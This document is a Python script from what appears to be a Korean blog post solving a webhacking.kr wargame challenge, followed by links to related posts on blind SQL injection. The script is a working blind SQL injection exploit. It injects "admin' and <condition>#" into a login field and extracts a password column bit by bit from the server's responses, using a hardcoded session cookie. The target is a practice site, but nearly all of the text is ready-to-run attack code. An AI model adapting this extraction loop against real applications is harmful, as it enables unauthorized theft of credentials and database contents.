import http.client
import urllib
import math
def fetch_string(statement):
    # skip fetching length
    length = 32

    ret = ''
    for i in range(1, length + 1):
        tmp =''
        for x in range(8):
            tmp += '1' if test('ord(mid(%s,%d,1))&%d'%(statement,i,2**x)) else '0'
            #tmp+=
        print(tmp[::-1])
        print(tmp)
        ret+=chr(int(tmp[::-1],2))
        print(ret)
        
    return ret
def test(cond):
    c = http.client.HTTPConnection('webhacking.kr')
    head={'Host':'webhacking.kr'}
    head['Upgrade-Insecure-Requests']='1'
    head['Content-Type']='application/x-www-form-urlencoded'
    head['Cookie']='id=rbc; PHPSESSID=7e74a61eb46338352194ab8d2d1535db'
    _body='uuid=admin%27+and+{}%23&pw=123'.format(urllib.parse.quote(cond))
    c.request('POST','/challenge/bonus/bonus-2/index.php',headers=head, body=_body)
    res=c.getresponse().read().decode()
    return 'Wrong!' not in res
fetch_string('pw')

'war game > webhacking.kr' 카테고리의 다른 글

[webhacking.kr] 41번  (0) 2017.02.01
[webhacking.kr]55번 left right을 이용한 blind sql  (0) 2017.01.31
[webhacking.kr 21]blind sql injection  (0) 2017.01.30
[webhacking.kr] 6번 100pt  (0) 2017.01.18
[webhacking.kr]23번 200pt  (0) 2017.01.18

+ Recent posts

티스토리툴바